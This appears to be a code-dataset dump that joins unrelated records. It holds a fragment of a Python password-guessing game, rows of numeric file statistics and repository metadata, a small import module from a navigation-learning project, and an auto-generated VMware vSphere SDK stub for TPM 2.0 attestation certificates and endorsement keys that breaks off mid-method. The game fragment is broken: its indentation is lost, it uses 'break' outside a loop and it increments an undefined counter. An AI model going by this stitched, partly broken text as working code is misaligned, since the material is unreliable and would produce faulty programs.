print("Surname: "+ Level_2_Surnames[21])
print("Date of Birth: "+ Level_2_DOBs[21])
def Victims_Data_HLS23():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms23 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[22])
print("Surname: "+ Level_2_Surnames[22])
print("Date of Birth: "+ Level_2_DOBs[22])
def Victims_Data_HLS24():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms24 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[23])
print("Surname: "+ Level_2_Surnames[23])
print("Date of Birth: "+ Level_2_DOBs[23])
def Victims_Data_HLS25():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms25 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[24])
print("Surname: "+ Level_2_Surnames[24])
print("Date of Birth: "+ Level_2_DOBs[24])
def Victims_Data_HLS26():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms26 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[25])
print("Surname: "+ Level_2_Surnames[25])
print("Date of Birth: "+ Level_2_DOBs[25])
def Victims_Data_HLS27():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms27 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[26])
print("Surname: "+ Level_2_Surnames[26])
print("Date of Birth: "+ Level_2_DOBs[26])
def Victims_Data_HLS28():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms28 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[27])
print("Surname: "+ Level_2_Surnames[27])
print("Date of Birth: "+ Level_2_DOBs[27])
def Victims_Data_HLS29():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms29 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[28])
print("Surname: "+ Level_2_Surnames[28])
print("Date of Birth: "+ Level_2_DOBs[28])
def Victims_Data_HLS30():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms30 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[29])
print("Surname: "+ Level_2_Surnames[29])
print("Date of Birth: "+ Level_2_DOBs[29])
def Victims_Data_HLS31():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms31 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[30])
print("Surname: "+ Level_2_Surnames[30])
print("Date of Birth: "+ Level_2_DOBs[30])
def Victims_Data_HLS32():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms32 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[31])
print("Surname: "+ Level_2_Surnames[31])
print("Date of Birth: "+ Level_2_DOBs[31])
def Victims_Data_HLS33():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms33 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[32])
print("Surname: "+ Level_2_Surnames[32])
print("Date of Birth: "+ Level_2_DOBs[32])
def Victims_Data_HLS34():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms34 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[33])
print("Surname: "+ Level_2_Surnames[33])
print("Date of Birth: "+ Level_2_DOBs[33])
def Victims_Data_HLS35():
print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + Ms35 + Bright_Red +" [Password Has 9 Char...] "+ Rest)
print(Bright_Green + "Name: "+ Level_1_Names[34])
print("Surname: "+ Level_2_Surnames[34])
print("Date of Birth: "+ Level_2_DOBs[34])
#Stage 1 In Easy Level
def ELStage1():
Stage1 = input(Bright_Cyan + "Password: ")
if Stage1 == EL_Passwords[0]:
print(BG_Dark_Magenta + Bright_Yellow)
Stage1_msg = " Congradulations \n\
You Won "
for char in Stage1_msg:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.1)
print(Rest)
print(BG_Dark_Blue + " " + Bright_Green + Stage1 + " Is Correct! "+ Rest)
print("\n\
")
#Trying Again Config
def Try_Again():
print(Bright_Red + "You Running out of lucks.")
Trying_Again += 1
if Trying_Again == 3:
GameOver = "GameOver\n\
Try Better Next Time."
print(BG_Bright_Cyan + Bright_Red + "")
for char in GameOver:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.1)
break
| 50.627338
| 135
| 0.625988
| 4,803
| 35,186
| 4.270664
| 0.05788
| 0.093019
| 0.067814
| 0.087022
| 0.941303
| 0.89611
| 0.888699
| 0.827759
| 0.827759
| 0.827759
| 0
| 0.054119
| 0.202296
| 35,186
| 695
| 136
| 50.627338
| 0.676678
| 0.004775
| 0
| 0.617801
| 0
| 0
| 0.230754
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.188482
| false
| 0.191972
| 0.00349
| 0
| 0.191972
| 0.746946
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
|
0
| 8
|
72c5b4f84eee7a4255278b49254946cd7d450872
| 265
|
py
|
Python
|
pointnav_vo/rl/__init__.py
|
rxlqn/PointNav-VO
|
6f7672482a3f1628a3b11025709518ee166e812b
|
[
"Apache-2.0"
] | 25
|
2021-08-28T04:06:31.000Z
|
2022-03-02T23:03:13.000Z
|
pointnav_vo/rl/__init__.py
|
rxlqn/PointNav-VO
|
6f7672482a3f1628a3b11025709518ee166e812b
|
[
"Apache-2.0"
] | 11
|
2021-10-01T07:03:11.000Z
|
2022-03-26T02:28:44.000Z
|
pointnav_vo/rl/__init__.py
|
rxlqn/PointNav-VO
|
6f7672482a3f1628a3b11025709518ee166e812b
|
[
"Apache-2.0"
] | 5
|
2021-09-01T09:05:42.000Z
|
2022-01-27T10:11:37.000Z
|
from pointnav_vo.rl.policies.resnet_policy import PointNavResNetPolicy
from pointnav_vo.rl.common.base_trainer import BaseTrainer, BaseRLTrainer
from pointnav_vo.rl.ppo.ppo_trainer import PPOTrainer
from pointnav_vo.rl.ddppo.algo.ddppo_trainer import DDPPOTrainer
| 44.166667
| 73
| 0.879245
| 38
| 265
| 5.921053
| 0.5
| 0.213333
| 0.248889
| 0.284444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.067925
| 265
| 5
| 74
| 53
| 0.910931
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
72c71b05894423e8e1a9d85cc2f7a117e8bc26f8
| 66,970
|
py
|
Python
|
com/vmware/vcenter/trusted_infrastructure/trust_authority_clusters/attestation/tpm2_client.py
|
adammillerio/vsphere-automation-sdk-python
|
c07e1be98615201139b26c28db3aa584c4254b66
|
[
"MIT"
] | null | null | null |
com/vmware/vcenter/trusted_infrastructure/trust_authority_clusters/attestation/tpm2_client.py
|
adammillerio/vsphere-automation-sdk-python
|
c07e1be98615201139b26c28db3aa584c4254b66
|
[
"MIT"
] | null | null | null |
com/vmware/vcenter/trusted_infrastructure/trust_authority_clusters/attestation/tpm2_client.py
|
adammillerio/vsphere-automation-sdk-python
|
c07e1be98615201139b26c28db3aa584c4254b66
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
#---------------------------------------------------------------------------
# Copyright 2020 VMware, Inc. All rights reserved.
# AUTO GENERATED FILE -- DO NOT MODIFY!
#
# vAPI stub file for package com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.
#---------------------------------------------------------------------------
"""
The
``com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2_client``
module provides classes to manage remote attestation configuration for TPM
trust.
"""
__author__ = 'VMware, Inc.'
__docformat__ = 'restructuredtext en'
import sys
from com.vmware.cis_client import Tasks
from vmware.vapi.stdlib.client.task import Task
from vmware.vapi.bindings import type
from vmware.vapi.bindings.converter import TypeConverter
from vmware.vapi.bindings.enum import Enum
from vmware.vapi.bindings.error import VapiError
from vmware.vapi.bindings.struct import VapiStruct
from vmware.vapi.bindings.stub import (
ApiInterfaceStub, StubFactoryBase, VapiInterface)
from vmware.vapi.bindings.common import raise_core_exception
from vmware.vapi.data.validator import (UnionValidator, HasFieldsOfValidator)
from vmware.vapi.exception import CoreException
from vmware.vapi.lib.constants import TaskType
from vmware.vapi.lib.rest import OperationRestMetadata
class CaCertificates(VapiInterface):
"""
The ``CaCertificates`` class provides methods to manage Trusted Platform
Module (TPM) CA certificates.
Endorsement Keys are typically packaged in a certificate that is signed by
a certificate authority (CA). This class allows the CA certificate to be
registered with the Attestation Service in order to validate TPM EK
certificates when presented at attestation time.. This class was added in
vSphere API 7.0.0.
"""
RESOURCE_TYPE = "com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.CaCertificate"
"""
Resource type for TPM 2.0 CA certificates. This class attribute was added in
vSphere API 7.0.0.
"""
_VAPI_SERVICE_ID = 'com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.ca_certificates'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _CaCertificatesStub)
self._VAPI_OPERATION_IDS = {}
self._VAPI_OPERATION_IDS.update({'list_task': 'list$task'})
self._VAPI_OPERATION_IDS.update({'create_task': 'create$task'})
self._VAPI_OPERATION_IDS.update({'delete_task': 'delete$task'})
self._VAPI_OPERATION_IDS.update({'get_task': 'get$task'})
class Health(Enum):
"""
The ``CaCertificates.Health`` class is indicator for the consistency of the
hosts status in the cluster. This enumeration was added in vSphere API
7.0.0.
.. note::
This class represents an enumerated type in the interface language
definition. The class contains class attributes which represent the
values in the current version of the enumerated type. Newer versions of
the enumerated type may contain new values. To use new values of the
enumerated type in communication with a server that supports the newer
version of the API, you instantiate this class. See :ref:`enumerated
type description page <enumeration_description>`.
"""
NONE = None
"""
No status available. This class attribute was added in vSphere API 7.0.0.
"""
OK = None
"""
Each host in the cluster is in consistent state with the rest hosts in the
cluster. This class attribute was added in vSphere API 7.0.0.
"""
WARNING = None
"""
Attestation is funtioning, however there is an issue that requires
attention. This class attribute was added in vSphere API 7.0.0.
"""
ERROR = None
"""
Not all hosts in the cluster are in consistent state. This class attribute
was added in vSphere API 7.0.0.
"""
def __init__(self, string):
"""
:type string: :class:`str`
:param string: String value for the :class:`Health` instance.
"""
Enum.__init__(string)
Health._set_values([
Health('NONE'),
Health('OK'),
Health('WARNING'),
Health('ERROR'),
])
Health._set_binding_type(type.EnumType(
'com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.ca_certificates.health',
Health))
class Summary(VapiStruct):
"""
The ``CaCertificates.Summary`` class contains information that summarizes a
TPM CA certificate. This class was added in vSphere API 7.0.0.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
def __init__(self,
name=None,
health=None,
):
"""
:type name: :class:`str`
:param name: A unique name for the TPM CA certificate. This attribute was added
in vSphere API 7.0.0.
When clients pass a value of this class as a parameter, the
attribute must be an identifier for the resource type:
``com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.CaCertificate``.
When methods return a value of this class as a return value, the
attribute will be an identifier for the resource type:
``com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.CaCertificate``.
:type health: :class:`CaCertificates.Health`
:param health: A health indicator which indicates whether each host in the cluster
has the same CA certs. This attribute was added in vSphere API
7.0.0.
"""
self.name = name
self.health = health
VapiStruct.__init__(self)
Summary._set_binding_type(type.StructType(
'com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.ca_certificates.summary', {
'name': type.IdType(resource_types='com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.CaCertificate'),
'health': type.ReferenceType(__name__, 'CaCertificates.Health'),
},
Summary,
False,
None))
class Info(VapiStruct):
"""
The ``CaCertificates.Info`` class contains information that describes a TPM
CA certificate. This class was added in vSphere API 7.0.0.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
def __init__(self,
cert_chain=None,
health=None,
details=None,
):
"""
:type cert_chain: :class:`com.vmware.vcenter.trusted_infrastructure_client.X509CertChain`
:param cert_chain: The CA certificate chain. This attribute was added in vSphere API
7.0.0.
:type health: :class:`CaCertificates.Health`
:param health: A health indicator which indicates whether each host in the cluster
has the same CA certs. This attribute was added in vSphere API
7.0.0.
:type details: :class:`list` of :class:`com.vmware.vapi.std_client.LocalizableMessage`
:param details: Details regarding the health.
When the ``CaCertificates.Health`` is not
:attr:`CaCertificates.Health.OK` or
:attr:`CaCertificates.Health.NONE`, this member will provide an
actionable description of the issues present.. This attribute was
added in vSphere API 7.0.0.
"""
self.cert_chain = cert_chain
self.health = health
self.details = details
VapiStruct.__init__(self)
Info._set_binding_type(type.StructType(
'com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.ca_certificates.info', {
'cert_chain': type.ReferenceType('com.vmware.vcenter.trusted_infrastructure_client', 'X509CertChain'),
'health': type.ReferenceType(__name__, 'CaCertificates.Health'),
'details': type.ListType(type.ReferenceType('com.vmware.vapi.std_client', 'LocalizableMessage')),
},
Info,
False,
None))
class CreateSpec(VapiStruct):
"""
The ``CaCertificates.CreateSpec`` class contains information that describes
a TPM CA certificate. This class was added in vSphere API 7.0.0.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
def __init__(self,
name=None,
cert_chain=None,
):
"""
:type name: :class:`str`
:param name: A unique name for the TPM CA certificate. This attribute was added
in vSphere API 7.0.0.
When clients pass a value of this class as a parameter, the
attribute must be an identifier for the resource type:
``com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.CaCertificate``.
When methods return a value of this class as a return value, the
attribute will be an identifier for the resource type:
``com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.CaCertificate``.
:type cert_chain: :class:`com.vmware.vcenter.trusted_infrastructure_client.X509CertChain` or ``None``
:param cert_chain: The CA certificate chain.
Certificates may either be added one at a time, or as a chain.
Adding the certificates as a chain allows the group to be managed
as a whole. For example, an entire chain can be deleted in one
:func:`CaCertificates.delete` operation.
When certificates are added one at a time, the order must be root
first, followed by any intermediates. The intermediates
certificates must also be ordered in the direction from root to
leaf.
Similarly, when added as a chain the list must be ordered in the
direction from root to leaf.. This attribute was added in vSphere
API 7.0.0.
If None creation will fail.
"""
self.name = name
self.cert_chain = cert_chain
VapiStruct.__init__(self)
CreateSpec._set_binding_type(type.StructType(
'com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.ca_certificates.create_spec', {
'name': type.IdType(resource_types='com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.CaCertificate'),
'cert_chain': type.OptionalType(type.ReferenceType('com.vmware.vcenter.trusted_infrastructure_client', 'X509CertChain')),
},
CreateSpec,
False,
None))
def list_task(self,
cluster,
):
"""
Return a list of configured TPM CA certificates on a cluster. This
method was added in vSphere API 7.0.0.
:type cluster: :class:`str`
:param cluster: The id of the cluster on which the operation will be executed.
The parameter must be an identifier for the resource type:
``ClusterComputeResource``.
:rtype: :class: `vmware.vapi.stdlib.client.task.Task`
:return: Task instance
:raise: :class:`com.vmware.vapi.std.errors_client.Error`
if there is a generic error.
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidArgument`
if cluster id is empty.
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
if the ``cluster`` doesn't match to any cluster in the vCenter or
given name is not found.
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthenticated`
if the caller is not authenticated.
"""
task_id = self._invoke('list$task',
{
'cluster': cluster,
})
task_svc = Tasks(self._config)
task_instance = Task(task_id, task_svc, type.ListType(type.ReferenceType(__name__, 'CaCertificates.Summary')))
return task_instance
def create_task(self,
cluster,
spec,
):
"""
Add a new TPM CA certificate on a cluster. This method was added in
vSphere API 7.0.0.
:type cluster: :class:`str`
:param cluster: The id of the cluster on which the operation will be executed.
The parameter must be an identifier for the resource type:
``ClusterComputeResource``.
:type spec: :class:`CaCertificates.CreateSpec`
:param spec: The new CA certificate details.
:raise: :class:`com.vmware.vapi.std.errors_client.AlreadyExists`
if the certificate name exists.
:raise: :class:`com.vmware.vapi.std.errors_client.Error`
if there is a generic error.
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidArgument`
if the configuration is invalid or the cluster id is empty.
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
if ``cluster`` doesn't match to any cluster in the vCenter.
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthenticated`
if the caller is not authenticated.
"""
task_id = self._invoke('create$task',
{
'cluster': cluster,
'spec': spec,
})
task_svc = Tasks(self._config)
task_instance = Task(task_id, task_svc, type.VoidType())
return task_instance
def delete_task(self,
cluster,
name,
):
"""
Remove a TPM CA certificate on a cluster. This method was added in
vSphere API 7.0.0.
:type cluster: :class:`str`
:param cluster: The id of the cluster on which the operation will be executed.
The parameter must be an identifier for the resource type:
``ClusterComputeResource``.
:type name: :class:`str`
:param name: The CA certificate name.
The parameter must be an identifier for the resource type:
``com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.CaCertificate``.
:raise: :class:`com.vmware.vapi.std.errors_client.Error`
if there is a generic error.
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidArgument`
if the name is invalid or cluster id is empty.
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
if the ``cluster`` doesn't match to any cluster in the vCenter or
given name is not found.
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthenticated`
if the caller is not authenticated.
"""
task_id = self._invoke('delete$task',
{
'cluster': cluster,
'name': name,
})
task_svc = Tasks(self._config)
task_instance = Task(task_id, task_svc, type.VoidType())
return task_instance
def get_task(self,
cluster,
name,
):
"""
Get the TPM CA certificate details on a cluster. This method was added
in vSphere API 7.0.0.
:type cluster: :class:`str`
:param cluster: The id of the cluster on which the operation will be executed.
The parameter must be an identifier for the resource type:
``ClusterComputeResource``.
:type name: :class:`str`
:param name: The CA certificate name.
The parameter must be an identifier for the resource type:
``com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.CaCertificate``.
:rtype: :class: `vmware.vapi.stdlib.client.task.Task`
:return: Task instance
:raise: :class:`com.vmware.vapi.std.errors_client.Error`
if there is a generic error.
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidArgument`
if the name is invalid or cluster id is empty.
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
if the CA certificate is not found or ``cluster`` doesn't match to
any cluster in the vCenter.
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthenticated`
if the caller is not authenticated.
"""
task_id = self._invoke('get$task',
{
'cluster': cluster,
'name': name,
})
task_svc = Tasks(self._config)
task_instance = Task(task_id, task_svc, type.ReferenceType(__name__, 'CaCertificates.Info'))
return task_instance
class EndorsementKeys(VapiInterface):
"""
The ``EndorsementKeys`` class provides methods to manage Trusted Platform
Module (TPM) Endorsement Keys (EK) on a cluster level. This class was added
in vSphere API 7.0.0.
"""
RESOURCE_TYPE = "com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.EndorsementKey"
"""
Resource type for TPM 2.0 endorsement keys. This class attribute was added in
vSphere API 7.0.0.
"""
_VAPI_SERVICE_ID = 'com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.endorsement_keys'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _EndorsementKeysStub)
self._VAPI_OPERATION_IDS = {}
self._VAPI_OPERATION_IDS.update({'list_task': 'list$task'})
self._VAPI_OPERATION_IDS.update({'create_task': 'create$task'})
self._VAPI_OPERATION_IDS.update({'delete_task': 'delete$task'})
self._VAPI_OPERATION_IDS.update({'get_task': 'get$task'})
class Health(Enum):
"""
The ``EndorsementKeys.Health`` class is indicator for the consistency of
the hosts status in the cluster. This enumeration was added in vSphere API
7.0.0.
.. note::
This class represents an enumerated type in the interface language
definition. The class contains class attributes which represent the
values in the current version of the enumerated type. Newer versions of
the enumerated type may contain new values. To use new values of the
enumerated type in communication with a server that supports the newer
version of the API, you instantiate this class. See :ref:`enumerated
type description page <enumeration_description>`.
"""
NONE = None
"""
No status available. This class attribute was added in vSphere API 7.0.0.
"""
OK = None
"""
Each host in the cluster is in consistent state with the rest hosts in the
cluster. This class attribute was added in vSphere API 7.0.0.
"""
WARNING = None
"""
Attestation is functioning, however there is an issue that requires
attention. This class attribute was added in vSphere API 7.0.0.
"""
ERROR = None
"""
Not all hosts in the cluster are in consistent state. This class attribute
was added in vSphere API 7.0.0.
"""
def __init__(self, string):
"""
:type string: :class:`str`
:param string: String value for the :class:`Health` instance.
"""
Enum.__init__(string)
Health._set_values([
Health('NONE'),
Health('OK'),
Health('WARNING'),
Health('ERROR'),
])
Health._set_binding_type(type.EnumType(
'com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.endorsement_keys.health',
Health))
class Summary(VapiStruct):
"""
The ``EndorsementKeys.Summary`` class contains information that summarizes
a TPM endorsement key. This class was added in vSphere API 7.0.0.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
def __init__(self,
name=None,
health=None,
):
"""
:type name: :class:`str`
:param name: A unique name for the TPM endorsement key. This attribute was added
in vSphere API 7.0.0.
When clients pass a value of this class as a parameter, the
attribute must be an identifier for the resource type:
``com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.EndorsementKey``.
When methods return a value of this class as a return value, the
attribute will be an identifier for the resource type:
``com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.EndorsementKey``.
:type health: :class:`EndorsementKeys.Health`
:param health: A health indicator which indicates whether each host in the cluster
has the same endorsement key. This attribute was added in vSphere
API 7.0.0.
"""
self.name = name
self.health = health
VapiStruct.__init__(self)
Summary._set_binding_type(type.StructType(
'com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.endorsement_keys.summary', {
'name': type.IdType(resource_types='com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.EndorsementKey'),
'health': type.ReferenceType(__name__, 'EndorsementKeys.Health'),
},
Summary,
False,
None))
class Info(VapiStruct):
"""
The ``EndorsementKeys.Info`` class contains information that describes a
TPM endorsement key. This class was added in vSphere API 7.0.0.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
def __init__(self,
public_key=None,
health=None,
details=None,
):
"""
:type public_key: :class:`str`
:param public_key: TPM public endorsement key in PEM format. This attribute was added
in vSphere API 7.0.0.
:type health: :class:`EndorsementKeys.Health`
:param health: A health indicator which indicates whether each host in the cluster
has the same endorsement key. This attribute was added in vSphere
API 7.0.0.
:type details: :class:`list` of :class:`com.vmware.vapi.std_client.LocalizableMessage`
:param details: Details regarding the health.
When the ``EndorsementKeys.Health`` is not
:attr:`EndorsementKeys.Health.OK` or
:attr:`EndorsementKeys.Health.NONE`, this member will provide an
actionable description of the issues present.. This attribute was
added in vSphere API 7.0.0.
"""
self.public_key = public_key
self.health = health
self.details = details
VapiStruct.__init__(self)
Info._set_binding_type(type.StructType(
'com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.endorsement_keys.info', {
'public_key': type.StringType(),
'health': type.ReferenceType(__name__, 'EndorsementKeys.Health'),
'details': type.ListType(type.ReferenceType('com.vmware.vapi.std_client', 'LocalizableMessage')),
},
Info,
False,
None))
class CreateSpec(VapiStruct):
"""
The ``EndorsementKeys.CreateSpec`` class contains information that
describes a TPM endorsement key.
Only one of :attr:`EndorsementKeys.CreateSpec.public_key` or
:attr:`EndorsementKeys.CreateSpec.certificate` must be specified.. This
class was added in vSphere API 7.0.0.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
def __init__(self,
name=None,
public_key=None,
certificate=None,
):
"""
:type name: :class:`str`
:param name: A unique name for the TPM endorsement key.
The unique name should be something that an administrator can use
to easily identify the remote system. For example, the hostname, or
hardware UUID.. This attribute was added in vSphere API 7.0.0.
When clients pass a value of this class as a parameter, the
attribute must be an identifier for the resource type:
``com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.EndorsementKey``.
When methods return a value of this class as a return value, the
attribute will be an identifier for the resource type:
``com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.EndorsementKey``.
:type public_key: :class:`str` or ``None``
:param public_key: TPM public endorsement key in PEM format. This attribute was added
in vSphere API 7.0.0.
If None :attr:`EndorsementKeys.CreateSpec.certificate` must be
:class:`set`.
:type certificate: :class:`str` or ``None``
:param certificate: TPM endorsement key certificate in PEM format.
When a endorsement key certificate is provided, it will be verified
against the CA certificate list. Endorsement key certificates that
are not signed by one of the CA certificates will be rejected.
Using this format allows for failures to be caught during
configuration rather than later during attestation.. This attribute
was added in vSphere API 7.0.0.
If None :attr:`EndorsementKeys.CreateSpec.public_key` must be
:class:`set`.
"""
self.name = name
self.public_key = public_key
self.certificate = certificate
VapiStruct.__init__(self)
CreateSpec._set_binding_type(type.StructType(
'com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.endorsement_keys.create_spec', {
'name': type.IdType(resource_types='com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.EndorsementKey'),
'public_key': type.OptionalType(type.StringType()),
'certificate': type.OptionalType(type.StringType()),
},
CreateSpec,
False,
None))
def list_task(self,
cluster,
):
"""
Return a list of configured TPM endorsement keys in a cluster. This
method was added in vSphere API 7.0.0.
:type cluster: :class:`str`
:param cluster: The id of the cluster on which the operation will be executed.
The parameter must be an identifier for the resource type:
``ClusterComputeResource``.
:rtype: :class: `vmware.vapi.stdlib.client.task.Task`
:return: Task instance
:raise: :class:`com.vmware.vapi.std.errors_client.Error`
if there is a generic error.
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidArgument`
if the cluster id is empty.
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
if the cluster is not found.
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthenticated`
if the caller is not authenticated.
"""
task_id = self._invoke('list$task',
{
'cluster': cluster,
})
task_svc = Tasks(self._config)
task_instance = Task(task_id, task_svc, type.ListType(type.ReferenceType(__name__, 'EndorsementKeys.Summary')))
return task_instance
def create_task(self,
cluster,
spec,
):
"""
Add a new TPM endorsement key on a cluster. This method was added in
vSphere API 7.0.0.
:type cluster: :class:`str`
:param cluster: The id of the cluster on which the operation will be executed.
The parameter must be an identifier for the resource type:
``ClusterComputeResource``.
:type spec: :class:`EndorsementKeys.CreateSpec`
:param spec: The configuration.
:raise: :class:`com.vmware.vapi.std.errors_client.AlreadyExists`
if the endorsement key name exists.
:raise: :class:`com.vmware.vapi.std.errors_client.Error`
if there is a generic error.
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidArgument`
if the configuration is invalid or cluster id is empty.
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
if ``cluster`` doesn't match to any cluster in the vCenter.
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthenticated`
if the caller is not authenticated.
"""
task_id = self._invoke('create$task',
{
'cluster': cluster,
'spec': spec,
})
task_svc = Tasks(self._config)
task_instance = Task(task_id, task_svc, type.VoidType())
return task_instance
def delete_task(self,
cluster,
name,
):
"""
Remove a TPM endorsement key on a cluster. This method was added in
vSphere API 7.0.0.
:type cluster: :class:`str`
:param cluster: The id of the cluster on which the operation will be executed.
The parameter must be an identifier for the resource type:
``ClusterComputeResource``.
:type name: :class:`str`
:param name: The endorsement key name.
The parameter must be an identifier for the resource type:
``com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.EndorsementKey``.
:raise: :class:`com.vmware.vapi.std.errors_client.Error`
if there is a generic error.
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidArgument`
if the name is invalid or cluster id is empty.
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
if the name is not found or ``cluster`` doesn't match to any
cluster in the vCenter.
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthenticated`
if the caller is not authenticated.
"""
task_id = self._invoke('delete$task',
{
'cluster': cluster,
'name': name,
})
task_svc = Tasks(self._config)
task_instance = Task(task_id, task_svc, type.VoidType())
